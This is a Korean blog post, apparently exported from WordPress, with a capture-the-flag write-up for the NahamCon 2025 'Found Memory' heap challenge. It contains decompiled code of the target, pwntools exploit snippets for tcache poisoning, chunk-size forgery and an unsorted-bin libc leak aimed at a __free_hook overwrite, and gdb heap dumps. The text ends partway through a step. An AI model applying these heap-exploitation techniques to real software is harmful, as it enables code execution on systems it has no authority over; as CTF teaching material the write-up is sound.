{"id":3685,"date":"2025-05-28T16:27:54","date_gmt":"2025-05-28T07:27:54","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3685"},"modified":"2025-05-28T16:36:13","modified_gmt":"2025-05-28T07:36:13","slug":"nahamcon-2025-ctf-found-memory-fill-tcache-and-unsorted-bin-free_hook-fix-double-free-or-corruption-prev","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3685","title":{"rendered":"[NahamCon 2025 CTF] Found Memory (fill tcache and unsorted bin, free_hook, fix double free or corruption (!prev))"},"content":{"rendered":"\n

checksec<\/h3>\n\n\n\n
checksec .\/found_memory \n[*] '\/home\/ubuntu\/study\/naham2025\/found_memory\/found_memory'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    FORTIFY:    Enabled\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No<\/pre>\n\n\n\n
libc.so.6 \ubc84\uc804<\/h3>\n\n\n\n
Ubuntu GLIBC 2.31-0ubuntu9.17<\/strong><\/p>\n\n\n\n
.\/libc.so.6 \nGNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.17) stable release version 2.31.\nCopyright (C) 2020 Free Software Foundation, Inc.\nThis is free software; see the source for copying conditions.\nThere is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE.\nCompiled by GNU CC version 9.4.0.\nlibc ABIs: UNIQUE IFUNC ABSOLUTE\nFor bug reporting instructions, please see:\n<https:\/\/bugs.launchpad.net\/ubuntu\/+source\/glibc\/+bugs>.<\/pre>\n\n\n\n
Decompiled-src \/ Analysis<\/h3>\n\n\n\n
main<\/h3>\n\n\n\n
\uc544\ub798 \ucf54\ub4dc\ub97c \ubcf4\ub2e4\uc2dc\ud53c \ucd1d 4\uac00\uc9c0 \uba54\ub274\uac00 \uc874\uc7ac\ud55c\ub2e4.
\uccad\ud06c\ub97c \ud560\ub2f9\ud558\uac70\ub098, \ud560\ub2f9\ud574\uc81c\ud558\uac70\ub098, \ubcf4\uac70\ub098 \ud3b8\uc9d1\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
ssize_t menu()\n{\n  write(1, \"\\nMenu:\\n\", 7u);\n  write(1, \"1) Alloc\\n\", 9u);\n  write(1, \"2) Free\\n\", 8u);\n  write(1, \"3) View\\n\", 8u);\n  write(1, \"4) Edit\\n\", 8u);\n  write(1, \"5) Exit\\n\", 8u);\n  return write(1, \"> \", 2u);\n}\n\n\/\/ local variable allocation has failed, the output may be wrong!\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _QWORD *v3; \/\/ rax\n  char v5[40]; \/\/ [rsp+0h] [rbp-48h] BYREF\n  unsigned __int64 v6; \/\/ [rsp+28h] [rbp-20h]\n\n  v6 = __readfsqword(0x28u);\n  v3 = &allocs;\n  do\n  {\n    *v3 = 0;\n    v3 += 2;\n    *(v3 - 1) = 0;\n  }\n  while ( v3 != (_QWORD *)((char *)&allocs + 1600) );\n  while ( 1 )\n  {\n    menu(*(_QWORD *)&argc, argv);\n    if ( read(0, v5, 0x20u) <= 0 )\n      break;\n    argv = 0;\n    *(_QWORD *)&argc = v5;\n    switch ( (unsigned int)strtoul(v5, 0, 10) )\n    {\n      case 1u:\n        alloc_chunk();\n        break;\n      case 2u:\n        free_chunk();\n        break;\n      case 3u:\n        view_chunk();\n        break;\n      case 4u:\n        edit_chunk();\n        break;\n      case 5u:\n        _exit(0);\n      default:\n        argv = (const char **)\"Invalid choice.\\n\";\n        *(_QWORD *)&argc = 1;\n        write(1, \"Invalid choice.\\n\", 0x10u);\n        break;\n    }\n  }\n  return 0;\n}<\/pre>\n\n\n\n
alloc_chunk<\/h3>\n\n\n\n
\uccad\ud06c\ub97c \uc800\uc7a5\ud560 \uc218 \uc788\ub294 \uc2ac\ub86f\uc740 100\uac1c\uae4c\uc9c0\uc774\uba70, 
malloc \ud06c\uae30\ub294 0x30\uc73c\ub85c \uace0\uc815\ub41c\ub2e4.<\/p>\n\n\n\n
allocs \uc804\uc5ed\ubcc0\uc218\uac00 \uc874\uc7ac\ud558\ub294\ub370, \uccad\ud06c \uc2ac\ub86f\uc774 \ud558\ub098 \uc9c0\uc815\ub420\ub54c
(char *)&allocs + v3<\/code>\uc5d0 \ud560\ub2f9\uc8fc\uc18c,
(char *)&allocs + v3 + 8)<\/code>\uc5d0 malloc \ud06c\uae30\uc778 0x30\uc774 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n
unsigned __int64 alloc_chunk()\n{\n  int v0; \/\/ ebx\n  _QWORD *i; \/\/ rax\n  void *v2; \/\/ rax\n  __int64 v3; \/\/ rcx\n  char buf[4]; \/\/ [rsp+4h] [rbp-24h] BYREF\n  unsigned __int64 v6; \/\/ [rsp+8h] [rbp-20h]\n\n  v0 = 0;\n  v6 = __readfsqword(0x28u);\n  for ( i = &unk_4048; *i; i += 2 )\n  {\n    if ( ++v0 == 100 )\n    {\n      write(1, \"No free slots.\\n\", 0x10u);\n      return __readfsqword(0x28u) ^ v6;\n    }\n  }\n  v2 = malloc(0x30u);\n  v3 = 16LL * v0;\n  *(_QWORD *)((char *)&allocs + v3) = v2;\n  if ( v2 )\n  {\n    *(_QWORD *)((char *)&allocs + v3 + 8) = 0x30;\n    write(1, \"Allocated slot \", 0x10u);\n    __snprintf_chk(buf, 4, 1, 4, \"%d\", v0);\n    write(1, buf, strlen(buf));\n  }\n  else\n  {\n    write(1, \"Alloc failed.\\n\", 0xEu);\n  }\n  return __readfsqword(0x28u) ^ v6;\n}<\/pre>\n\n\n\n
free_chunk<\/h3>\n\n\n\n
\uc778\ub371\uc2a4\ub97c \uc785\ub825\ubc1b\uc73c\uba74, \ud574\ub2f9 \uc2ac\ub86f\uc758 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud55c\ub2e4. 
allocs \uc804\uc5ed\ubcc0\uc218\uc5d0 \ud560\ub2f9\uc8fc\uc18c\ub97c free\uc2dc\ud0a4\uc9c0\ub9cc \uc8fc\uc18c\ub294 \uadf8\ub300\ub85c \ub0a8\uc544\uc788\uc73c\uba70, 
\uc800\uc7a5\ub418\uc5c8\ub358 malloc \ud06c\uae30\ub294 0\uc73c\ub85c \uc9c0\uc815\ub41c\ub2e4.<\/p>\n\n\n\n
ssize_t free_chunk()\n{\n  int index; \/\/ eax\n  char *v1; \/\/ rbx\n\n  write(1, \"Index to free: \", 0xFu);\n  index = get_index();\n  if ( index >= 0 && (v1 = (char *)&allocs + 16 * index, *(_QWORD *)v1) )\n  {\n    free(*(void **)v1);\n    *((_QWORD *)v1 + 1) = 0;\n  }\n  else\n  {\n    write(1, \"Invalid slot.\\n\", 0xEu);\n  }\n  return write(1, \"Freed.\\n\", 7u);\n}<\/pre>\n\n\n\n
view_chunk<\/h3>\n\n\n\n
free \uc720\ubb34 \uc0c1\uad00\uc5c6\uc774 \uc778\ub371\uc2a4\ub97c \uc785\ub825\ubc1b\uc73c\uba74,
\ud574\ub2f9 \uccad\ud06c\uc5d0 \uc800\uc7a5\ub41c \ub370\uc774\ud130\ub97c \ubcf4\uc5ec\uc900\ub2e4.<\/p>\n\n\n\n
ssize_t view_chunk()\n{\n  int index; \/\/ eax\n  const void *v1; \/\/ rsi\n\n  write(1, \"Index to view: \", 0xFu);\n  index = get_index();\n  if ( index < 0 )\n    return write(1, \"Invalid slot.\\n\", 0xEu);\n  v1 = (const void *)*((_QWORD *)&allocs + 2 * index);\n  if ( !v1 )\n    return write(1, \"Invalid slot.\\n\", 0xEu);\n  write(1, v1, 0x30u);\n  return write(1, \"\\n\", 1u);\n}<\/pre>\n\n\n\n
edit_chunk<\/h3>\n\n\n\n
\ub9c8\ucc2c\uac00\uc9c0\ub85c free \uc720\ubb34 \uc0c1\uad00\uc5c6\uc774 \uc778\ub371\uc2a4\ub97c \uc785\ub825\ubc1b\uc73c\uba74,
\ud574\ub2f9 \uccad\ud06c\uc758 \ub370\uc774\ud130\ub97c \uc218\uc815\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
ssize_t edit_chunk()\n{\n  int index; \/\/ eax\n  void **v1; \/\/ rbx\n\n  write(1, \"Index to edit: \", 0xFu);\n  index = get_index();\n  if ( index < 0 )\n    return write(1, \"Invalid slot.\\n\", 0xEu);\n  v1 = (void **)((char *)&allocs + 16 * index);\n  if ( !*v1 )\n    return write(1, \"Invalid slot.\\n\", 0xEu);\n  write(1, \"Enter data: \", 0xCu);\n  return read(0, *v1, 0x2Fu);\n}<\/pre>\n\n\n\n
Solution<\/h3>\n\n\n\n
malloc \ud06c\uae30\ub294 0x30\uc73c\ub85c \uace0\uc815\ub418\uc788\uc9c0\ub9cc, \uccad\ud06c\uc758 fd\uac12\uc744 \uc218\uc815\uc2dc\ucf1c\uc11c \ud560\ub2f9\ud06c\uae30\ub97c 0x100\uc73c\ub85c \uc18d\uc774\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
tcache\ub97c \uac00\ub4dd\ucc44\uc6b0\uc11c unsorted bin\uc73c\ub85c \ud560\ub2f9 \ud574\uc81c\ud558\uac8c\ub054 \ub9cc\ub4e4\uc5b4 libc base \uc8fc\uc18c\ub97c \ud68d\ub4dd\ud558\uace0,
\ub2e4\uc2dc\ud55c\ubc88 fake chunk\ub97c \uad6c\uc131\ud574\uc11c free_hook \ud3ec\uc778\ud130 \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub9cc\ub4e4\uc5b4 system \uc8fc\uc18c\ub85c AAW\ud574\uc11c
sh \ubb38\uc790\uc5f4\uc774 \ub2f4\uae34 \uc2ac\ub86f\uc744 free\ud574\uc8fc\uba74 \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
\ud558\ub098\uc529 \ud55c\ubc88 \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n\n\n\n
1. alloc() 3\ubc88 \ud638\ucd9c\ud558\uace0 \uc804\ubd80\ub2e4\uc2dc free.<\/h3>\n\n\n\n
0x30\ud06c\uae30\ub85c malloc\ub41c \uccad\ud06c\uac00 free\ub418\uc5b4 tcache\uc5d0 \ub4e4\uc5b4\uac04 \uac83 \ud655\uc778.<\/p>\n\n\n\n
# index 0, 1, 2\nfor i in range(3):\n    alloc()\nfor i in range(3, -1, -1):\n    free(i)<\/pre>\n\n\n\n
    \n
  • Result<\/li>\n<\/ul>\n\n\n\n
    gdb-peda$ x\/8gx &allocs\n0x555555558040 <allocs>:\t0x00005555555592a0\t0x0000000000000000\n0x555555558050 <allocs+16>:\t0x00005555555592e0\t0x0000000000000000\n0x555555558060 <allocs+32>:\t0x0000555555559320\t0x0000000000000000\n0x555555558070 <allocs+48>:\t0x0000000000000000\t0x0000000000000000\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559350 (size : 0x20cb0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x40)   tcache_entry[2](3): 0x5555555592a0 --> 0x5555555592e0 --> 0x555555559320\ngdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x40                 Freed     0x5555555592e0              None\n0x5555555592d0      0x0                 0x40                 Freed     0x555555559320              None\n0x555555559310      0x0                 0x40                 Freed                0x0              None\n\ngdb-peda$ <\/pre>\n\n\n\n
    2. free\ub41c \uc778\ub371\uc2a41\uc758 fd\uac12 \ub204\ucd9c\ud6c4 -0x10\ub9cc\ud07c fd\uac12 \uc218\uc815.<\/h3>\n\n\n\n
    \uc778\ub371\uc2a41\uc5d0 \uc788\ub294 fd\uac12\uc744 \uc218\uc815\ud558\ub294\ub370, \uc774\ub294 \uccad\ud06c \ud06c\uae30\ub97c \ucd94\ud6c4 0x100\uc73c\ub85c \uc18d\uc774\uae30 \uc704\ud574\uc11c\ub2e4.<\/p>\n\n\n\n
    \ub2e4\uc2dc 3\ubc88\uc9f8\ub85c \ud560\ub2f9\ubc1b\uc744\ub54c\uc5d0 2\ubc88\uc9f8 \uccad\ud06c\uc758 mchunk_size \ud544\ub4dc\ub97c \uc218\uc815\ud560 \uc218 \uc788\uac8c
    2\ubc88\uc9f8 \ud560\ub2f9\uc8fc\uc18c-0x10\uc73c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n
    #Edit index 1\nleak = view(0)\nleak_fd = leak.split(b\"\\x00\")[0]\nleak_fd = uu64(leak_fd)\ninfo(f\"leak_fd: {hex(leak_fd)}\")\nedit(1, p64(leak_fd - 0x10)) #index1's alloc addr - 0x10<\/pre>\n\n\n\n
      \n
    • Result<\/li>\n<\/ul>\n\n\n\n
      gdb-peda$ x\/8gx &allocs\n0x555555558040 <allocs>:\t0x00005555555592a0\t0x0000000000000000\n0x555555558050 <allocs+16>:\t0x00005555555592e0\t0x0000000000000000\n0x555555558060 <allocs+32>:\t0x0000555555559320\t0x0000000000000000\n0x555555558070 <allocs+48>:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559350 (size : 0x20cb0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x40)   tcache_entry[2](3): 0x5555555592a0 --> 0x5555555592e0 --> 0x5555555592d0 (overlap chunk with 0x555555559290(freed) )\ngdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555559000      0x0                 0x290                Used                None              None\n0x555555559290      0x0                 0x40                 Freed     0x5555555592e0              None\n0x5555555592d0      0x0                 0x40                 Freed     0x5555555592d0              None\n0x555555559310      0x0                 0x40                 Used                None              None\n\ngdb-peda$ x\/8gx 0x5555555592d0\n0x5555555592d0:\t0x0000000000000000\t0x0000000000000041\n0x5555555592e0:\t0x00005555555592d0\t0x0000555555559010\n0x5555555592f0:\t0x0000000000000000\t0x0000000000000000\n0x555555559300:\t0x0000000000000000\t0x0000000000000000<\/pre>\n\n\n\n
      3. 3\ubc88\uc9f8 alloc \uc8fc\uc18c \ud655\uc778<\/h3>\n\n\n\n
      \uc774\uc81c 3\ubc88\uc9f8\ub85c \ud560\ub2f9\ub41c \uc8fc\uc18c\ub97c \uc0b4\ud3b4\ubcf4\uba74, 2\ubc88\uc9f8 \ud560\ub2f9\uc8fc\uc18c – 0x10\uc744 \uac00\ub9ac\ud0a8\ub2e4.
      \uc778\ub371\uc2a43 \uccad\ud06c\ub97c \ud1b5\ud574 2\ubc88\uc9f8 \uccad\ud06c\uc758 mchunk_size \ud544\ub4dc\ub97c 0x101\ub85c \uc218\uc815\ud574\uc8fc\uace0, \uc778\ub371\uc2a41 \uccad\ud06c\ub97c free\uc2dc\ucf1c\uc8fc\uc790.<\/p>\n\n\n\n
      # index 0\nalloc()\n# index 1\nalloc()\n# index 2\nalloc()\nedit(2, p64(0) + p64(0x101))\nfree(1)<\/pre>\n\n\n\n
        \n
      • Result<\/li>\n<\/ul>\n\n\n\n
        gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559350 (size : 0x20cb0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\ngdb-peda$ x\/8gx &allocs\n0x555555558040 <allocs>:\t0x00005555555592a0\t0x0000000000000030\n0x555555558050 <allocs+16>:\t0x00005555555592e0\t0x0000000000000030\n0x555555558060 <allocs+32>:\t0x00005555555592d0\t0x0000000000000030\n0x555555558070 <allocs+48>:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ x\/8gx 0x00005555555592d0\n0x5555555592d0:\t0x0000000000000000\t0x0000000000000000\n0x5555555592e0:\t0x00005555555592d0\t0x0000000000000000\n0x5555555592f0:\t0x0000000000000000\t0x0000000000000000\n0x555555559300:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$<\/pre>\n\n\n\n
        4. tcache 0x100 \ud655\uc778<\/h3>\n\n\n\n
        edit(2, p64(0) + p64(0x101))\nfree(1)<\/pre>\n\n\n\n
        \uc778\ub371\uc2a43 \uccad\ud06c\ub97c \ud1b5\ud574 2\ubc88\uc9f8 \uccad\ud06c\uc758 mchunk_size \ud544\ub4dc\ub97c 0x101\ub85c \uc218\uc815\ud574\uc8fc\uace0,
        \uc778\ub371\uc2a41 \uccad\ud06c\ub97c free\uc2dc\ucf30\uc744\ub54c \uacb0\uacfc\ub294 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n
        0x100 \uccad\ud06c\ub97c \uad00\ub9ac\ud558\ub294 tcache\uc5d0 \ud558\ub098 \ub4e4\uc5b4\uac04 \uc148\uc774\ub2e4!<\/strong><\/p>\n\n\n\n
          \n
        • Result<\/li>\n<\/ul>\n\n\n\n
          gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559350 (size : 0x20cb0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x100)   tcache_entry[14](1): 0x5555555592e0<\/pre>\n\n\n\n
          5. \uc704\uc5d0\uc11c \ud588\ub358 1~4\ubc88 \uacfc\uc815\uc744 7\ubc88 \ubc18\ubcf5\ud558\uae30<\/h3>\n\n\n\n
          \uc5ec\uae30\uae4c\uc9c0 \ud588\uc744\ub54c, tcache 0x100 \ub9ac\uc2a4\ud2b8\uac00 7\uac1c \uac00\ub4dd\ucc2c\uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
          \ud558\uc9c0\ub9cc \uc5ec\uae30\uc11c 1\ubc88 \ub354\ud558\uba74,
          \ud574\uc81c\ud558\ub824\ub294 heap \ub4a4\uc5d0 \uc704\uce58\ud558\ub294 heap\uc758 size\uc5d0 PREV_INUSE \ud50c\ub798\uadf8\uac00 \uc124\uc815\ub418\uc5b4 \uc788\ub294\uc9c0 \ud655\uc778\ud558\uae30 \ub54c\ubb38\uc5d0
          double free or corruption (!prev)<\/code> \uc5d0\ub7ec\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n
          \ud574\uc81c\ud558\ub824\ub294 heap \ub4a4\uc5d0 \uc704\uce58\ud558\ub294 heap\uc740,
          \ud574\uc81c\ud558\ub824\ub294 heap\uc758 mchunk_size \uac12\uc744 \ud1b5\ud574 \ub4a4\uc5d0 \uc704\uce58\ud558\ub294 \ud799 \uc704\uce58\ub97c \uacc4\uc0b0\ud574\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
          # Fill tcache \/ unsorted bin 0x100\nfor i in range(7):\n    idx_start = i*3\n    # index idx_start, idx_start+1, idx_start+2\n    for j in range(3):\n        alloc()\n    for j in range(idx_start+3, idx_start-1, -1):\n        free(j)\n\n    #Edit index idx_start+1\n    leak = view(idx_start)\n    leak_fd = leak.split(b\"\\x00\")[0]\n    leak_fd = uu64(leak_fd)\n    info(f\"leak_fd: {hex(leak_fd)}\")\n    edit(idx_start+1, p64(leak_fd - 0x10)) #index+1's alloc addr - 0x10\n\n    # index idx_start\n    alloc()\n    # index idx_start+1\n    alloc()\n    # index idx_start+2\n    alloc()\n    edit(idx_start+2, p64(0) + p64(0x101))\n    free(idx_start+1)\n    alloc()<\/pre>\n\n\n\n
            \n
          • Result<\/li>\n<\/ul>\n\n\n\n
            gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559990 (size : 0x20670) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x100)   tcache_entry[14](7): 0x5555555598e0 --> 0x5555555597e0 --> 0x5555555596e0 --> 0x5555555595e0 --> 0x5555555594e0 --> 0x5555555593e0 --> 0x5555555592e0<\/pre>\n\n\n\n
            6. double free or corruption (!prev)<\/code> \uc218\ub3d9\uc73c\ub85c \uc5d0\ub7ec \uace0\uccd0\ubcf4\uae30<\/strong><\/h3>\n\n\n\n
            1\ubc88 \ub354\ud558\ub294 \uacfc\uc815 \uc911\uc5d0\uc11c free \ud558\ub294 \ubd80\ubd84 \uc911\uac04\uc5d0 ip() \ub97c \ub123\uc5b4 \uba48\ucd94\uace0,
            \uc218\ub3d9\uc73c\ub85c \uc5d0\ub7ec\ub97c \uace0\uce58\uae30 \uc704\ud574 gdb\ub85c attach \ud574\ubcf8\ub2e4.<\/p>\n\n\n\n
            idx_start = 7*3\n# index idx_start, idx_start+1, idx_start+2\nfor j in range(3):\n    alloc()\nfor j in range(idx_start+3, idx_start-1, -1):\n    free(j)\n# Edit index idx_start+1\nleak = view(idx_start)\nleak_fd = leak.split(b\"\\x00\")[0]\nleak_fd = uu64(leak_fd)\ninfo(f\"leak_fd: {hex(leak_fd)}\")\nedit(idx_start+1, p64(leak_fd - 0x10)) #index1's alloc addr - 0x10\n# index idx_start\nalloc()\n# index idx_start+1\nalloc()\n# index idx_start+2\nalloc()\nedit(idx_start+2, p64(0) + p64(0x101))\nip()\n\n\n\n\n\nfree(idx_start+1) # double free or corruption (!prev)<\/pre>\n\n\n\n
            \ud574\uc81c\ud558\ub824\ub294 heap \ub4a4\uc5d0 \uc704\uce58\ud558\ub294 heap\uc758 size\uc5d0 PREV_INUSE \ud50c\ub798\uadf8\uac00 \uc124\uc815\ud574\uc8fc\uae30 \uc704\ud574
            x555555559ad0+0x100+8<\/strong>\uc704\uce58\uc758 mchunk_size\ub97c 0x101\uc73c\ub85c \uc18d\uc778\ub2e4.<\/p>\n\n\n\n
            gdb-peda$ x\/64gx &allocs\n0x555555558040 <allocs>:\t0x00005555555592a0\t0x0000000000000030\n0x555555558050 <allocs+16>:\t0x0000555555559360\t0x0000000000000030\n0x555555558060 <allocs+32>:\t0x00005555555592d0\t0x0000000000000030\n0x555555558070 <allocs+48>:\t0x00005555555593a0\t0x0000000000000030\n0x555555558080 <allocs+64>:\t0x0000555555559460\t0x0000000000000030\n0x555555558090 <allocs+80>:\t0x00005555555593d0\t0x0000000000000030\n0x5555555580a0 <allocs+96>:\t0x00005555555594a0\t0x0000000000000030\n0x5555555580b0 <allocs+112>:\t0x0000555555559560\t0x0000000000000030\n0x5555555580c0 <allocs+128>:\t0x00005555555594d0\t0x0000000000000030\n0x5555555580d0 <allocs+144>:\t0x00005555555595a0\t0x0000000000000030\n0x5555555580e0 <allocs+160>:\t0x0000555555559660\t0x0000000000000030\n0x5555555580f0 <allocs+176>:\t0x00005555555595d0\t0x0000000000000030\n0x555555558100 <allocs+192>:\t0x00005555555596a0\t0x0000000000000030\n0x555555558110 <allocs+208>:\t0x0000555555559760\t0x0000000000000030\n0x555555558120 <allocs+224>:\t0x00005555555596d0\t0x0000000000000030\n0x555555558130 <allocs+240>:\t0x00005555555597a0\t0x0000000000000030\n0x555555558140 <allocs+256>:\t0x0000555555559860\t0x0000000000000030\n0x555555558150 <allocs+272>:\t0x00005555555597d0\t0x0000000000000030\n0x555555558160 <allocs+288>:\t0x00005555555598a0\t0x0000000000000030\n0x555555558170 <allocs+304>:\t0x0000555555559960\t0x0000000000000030\n0x555555558180 <allocs+320>:\t0x00005555555598d0\t0x0000000000000030\n0x555555558190 <allocs+336>:\t0x00005555555599a0\t0x0000000000000030\n0x5555555581a0 <allocs+352>:\t0x00005555555599e0\t0x0000000000000030\n0x5555555581b0 <allocs+368>:\t0x00005555555599d0\t0x0000000000000030\n0x5555555581c0 <allocs+384>:\t0x0000000000000000\t0x0000000000000000\n0x5555555581d0 <allocs+400>:\t0x0000000000000000\t0x0000000000000000\n0x5555555581e0 <allocs+416>:\t0x0000000000000000\t0x0000000000000000\n0x5555555581f0 <allocs+432>:\t0x0000000000000000\t0x0000000000000000\n0x555555558200 <allocs+448>:\t0x0000000000000000\t0x0000000000000000\n0x555555558210 <allocs+464>:\t0x0000000000000000\t0x0000000000000000\n0x555555558220 <allocs+480>:\t0x0000000000000000\t0x0000000000000000\n0x555555558230 <allocs+496>:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ x\/4gx 0x555555559ad0\n0x555555559ad0:\t0x0000000000000000\t0x0000000000000000\n0x555555559ae0:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ set *(uint64_t*)0x555555559ad8 = 0x101<\/pre>\n\n\n\n
            7. corrupted size vs. prev_size<\/code> \uc5d0\ub7ec \uc218\ub3d9\uc73c\ub85c \uace0\uccd0\ubcf4\uae30<\/h3>\n\n\n\n
            \uace0\uce58\uace0 \uacc4\uc18d \uc2e4\ud589\uc2dc\ud0a4\uba74 corrupted size vs. prev_size<\/code> \uc5d0\ub7ec\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n
            \ud574\uc81c\ud558\ub824\ub294 heap \ub4a4\uc5d0 \uc704\uce58\ud558\ub294 heap chunk\uc758 \uc0ac\uc774\uc988\uc640
            \uadf8 \ub4a4\uc758 \ub4a4\ub97c \uc774\uc740 chunk\uc758 prev_size\uac00 \uac19\uc740\uc9c0 \ud655\uc778\ud558\uae30\uc5d0
            \uc544\ub798\uc640 \uac19\uc774 \ud55c\ubc88\ub354 0x101\ub85c \uc18d\uc778\ub2e4.<\/p>\n\n\n\n
            \uadf8\ub7ec\uba74 \uc131\uacf5\uc801\uc73c\ub85c unsorted bin 0x100\uc5d0 \ud558\ub098 \ub4e4\uc5b4\uac04 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
            gdb-peda$ x\/4gx 0x555555559ad0\n0x555555559ad0:\t0x0000000000000000\t0x0000000000000101\n0x555555559ae0:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ p\/x 0x555555559ad0+0x100\n$1 = 0x555555559bd0\ngdb-peda$ set *(uint64_t*)0x555555559bd8 = 0x101\ngdb-peda$ x\/4gx 0x555555559ad0+0x100\n0x555555559bd0:\t0x0000000000000000\t0x0000000000000101\n0x555555559be0:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ c\n\n(python3 \ucf54\ub4dc \uacc4\uc18d \uc2e4\ud589)\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555559a50 (size : 0x205b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x5555555599d0 (size : 0x100)\n(0x100)   tcache_entry[14](7): 0x5555555598e0 --> 0x5555555597e0 --> 0x5555555596e0 --> 0x5555555595e0 --> 0x5555555594e0 --> 0x5555555593e0 --> 0x5555555592e0<\/pre>\n\n\n\n
            8. 6, 7\ub2e8\uacc4\uc5d0 \ubc1c\uc0dd\ud55c \uc5d0\ub7ec \ud55c\ubc88\uc5d0 \uace0\uce58\uae30<\/h3>\n\n\n\n
            \uc0ac\uc2e4 malloc()\uc744 3\ubc88\ub9cc \ub354 \uc9c4\ud589\uc2dc\ucf1c\uc8fc\uc5b4\ub3c4 \ud574\uacb0\ub410\ub2e4.<\/p>\n\n\n\n
            free\uc2dc\ud0a4\ub824\ub294 \uccad\ud06c\ub97c \uc0b4\ud3b4\ubcf4\uba74,
            \ubcf4\ub2e4\uc2dc\ud53c 0x5555555599d0+0x100+8 \uc9c0\uc810\uc5d0 0x41\uc778 prev_in_use \ube44\ud2b8\uc640 \ud568\uaed8 \uccad\ud06c \ud06c\uae30\uac00 \uc4f0\uc5ec\uc838\uc788\uace0,
            \uadf8 \ub4a4\uc758 \ub4a4\ub97c \uc774\uc740 0x204f1\uc774\ub77c\ub294 top_chunk \uac12\uc774 \uc4f0\uc5ec\uc838 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n
